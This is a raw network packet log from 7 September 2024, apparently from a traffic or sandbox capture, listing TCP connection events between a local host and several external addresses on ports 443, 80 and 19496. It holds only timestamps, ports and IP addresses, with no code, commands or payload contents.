                                      Sep 7, 2024 01:47:50.808618069 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.808629036 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.808856010 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.809726954 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.856515884 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.921236038 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.922745943 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.922760010 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.961648941 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.961698055 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.961733103 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.961795092 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.961822033 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.961834908 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.961865902 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.961899042 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.971801996 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:51.056814909 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057554007 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.057576895 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057775974 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.057780981 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057831049 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.057845116 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057884932 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.057890892 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057946920 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.057954073 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.057996988 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058003902 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058096886 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058104992 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058128119 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058135033 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058182001 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058187962 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058211088 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058221102 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058341026 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058348894 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058367014 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058374882 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058377028 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058393955 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058423042 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058429956 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058543921 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058552027 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058564901 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058571100 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058665991 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058675051 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058692932 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058700085 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058738947 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058751106 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058778048 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058787107 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058798075 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058803082 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058820963 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058825970 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058871984 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058880091 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058893919 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058902979 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058911085 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058914900 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058948994 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.058957100 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.058995008 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059001923 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059062004 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059070110 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059084892 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059091091 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059163094 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059170008 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059259892 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059267044 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059308052 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059317112 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059333086 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059339046 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.059386969 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.059391022 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.757196903 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.757365942 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:51.757452965 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:51.803704023 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:52.070091963 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.070147038 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.070373058 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.072400093 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.072412014 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.858772993 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.858851910 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.860239029 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.860249996 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.860461950 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.871891022 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.912503004 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.993165970 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.993240118 CEST44349739188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:52.993294001 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:52.993971109 CEST49739443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:53.006922960 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.006958008 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.007055998 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.007303953 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.007316113 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.273792028 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:53.281080008 CEST8049743208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:53.281153917 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:53.281275034 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:53.288460970 CEST8049743208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:53.465930939 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.465995073 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.467298031 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.467309952 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.467535973 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.468400955 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.512491941 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633152962 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633204937 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633234024 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633275986 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.633292913 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633312941 CEST44349742104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:53.633331060 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.633348942 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.635226011 CEST49742443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:53.739532948 CEST8049743208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:53.781768084 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:54.241756916 CEST1949649733147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:54.241837978 CEST4973319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:56.689965010 CEST4973319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:56.692099094 CEST4974719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:56.696062088 CEST1949649733147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:56.700799942 CEST1949649747147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:56.700856924 CEST4974719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:56.755554914 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:56.755599976 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:56.755861044 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:56.758188009 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:56.758197069 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:56.830828905 CEST4974719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:56.898606062 CEST1949649747147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:57.462372065 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.462474108 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:57.464059114 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:57.464066029 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.464322090 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.477478981 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:57.524502993 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.606251955 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.606344938 CEST44349748188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:57.606600046 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:57.607100010 CEST49748443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:57.617018938 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:57.617079020 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:57.617271900 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:57.617531061 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:57.617547989 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.103421926 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.103508949 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:58.104892015 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:58.104903936 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.105154991 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.110207081 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:58.152512074 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.278475046 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.278543949 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.278574944 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.278673887 CEST44349749104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:58.278701067 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:58.278731108 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:58.280548096 CEST49749443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:00.020921946 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.020967007 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.021071911 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.023076057 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.023092031 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.491702080 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.491776943 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.493769884 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.493782043 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.494052887 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.511434078 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.556503057 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.648638964 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.648701906 CEST44349750188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:00.648752928 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.649465084 CEST49750443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:00.666784048 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:00.666820049 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:00.667193890 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:00.667440891 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:00.667449951 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.120014906 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.120085955 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.121630907 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.121639967 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.121867895 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.122735023 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.168494940 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278603077 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278651953 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278680086 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278744936 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.278773069 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278786898 CEST44349751104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:01.278924942 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.278924942 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.286782980 CEST49751443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:01.733351946 CEST1949649747147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:01.733438969 CEST4974719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:01.741503000 CEST4974719496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:01.746510029 CEST1949649747147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:01.779366970 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:01.784207106 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:01.784440994 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:01.886795044 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:01.891694069 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:02.210716009 CEST4975380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:02.215578079 CEST8049753208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:02.215656996 CEST4975380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:02.215751886 CEST4975380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:02.221046925 CEST8049753208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:02.799417019 CEST8049753208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:02.808799982 CEST4975380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:02.813925982 CEST8049753208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:48:02.813978910 CEST4975380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:03.885996103 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:03.886050940 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:03.886159897 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:03.887999058 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:03.888015985 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.386285067 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.386364937 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:04.387725115 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:04.387737036 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.387978077 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.410171032 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:04.456499100 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.564424038 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.564496040 CEST44349754188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:04.564551115 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:04.565434933 CEST49754443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:04.566550016 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:04.566589117 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:04.566668034 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:04.567034960 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:04.567048073 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.047724009 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.047811031 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.057378054 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.057398081 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.057641029 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.058504105 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.104500055 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388572931 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388605118 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388633013 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388691902 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.388710022 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388720036 CEST44349756104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:05.388761997 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:05.390717030 CEST49756443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.261543036 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.261584997 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.261703968 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.264198065 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.264216900 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.701728106 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:06.701854944 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:06.760030031 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.760113955 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.761615992 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.761635065 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.761864901 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.777703047 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.824502945 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.896924973 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.896985054 CEST44349758188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:06.897038937 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.897866964 CEST49758443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:06.898960114 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.898994923 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:06.899143934 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.899408102 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:06.899418116 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.004169941 CEST4974380192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:48:07.377073050 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.377161026 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.381167889 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.381175995 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.381434917 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.383047104 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.428495884 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528428078 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528469086 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528498888 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528548002 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.528567076 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528578997 CEST44349759104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:07.528639078 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.530922890 CEST49759443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:07.751466036 CEST4975219496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.753505945 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.758975029 CEST1949649752147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:07.758990049 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:07.759083033 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.778106928 CEST4976019496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:48:07.783024073 CEST1949649760147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:48:08.671036005 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.671080112 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:08.671150923 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.673171997 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:08.673185110 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.165455103 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.165539026 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.167215109 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.167222977 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.167448997 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.181615114 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.228502035 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287836075 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287909985 CEST44349761188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:48:09.287961006 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.288674116 CEST49761443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:48:09.289736032 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.289796114 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.289869070 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.290118933 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.290134907 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.753707886 CEST44349763104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:48:09.753772020 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.754893064 CEST49763443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:48:09.754899979 CEST44349763104.21.85.189192.168.2.5
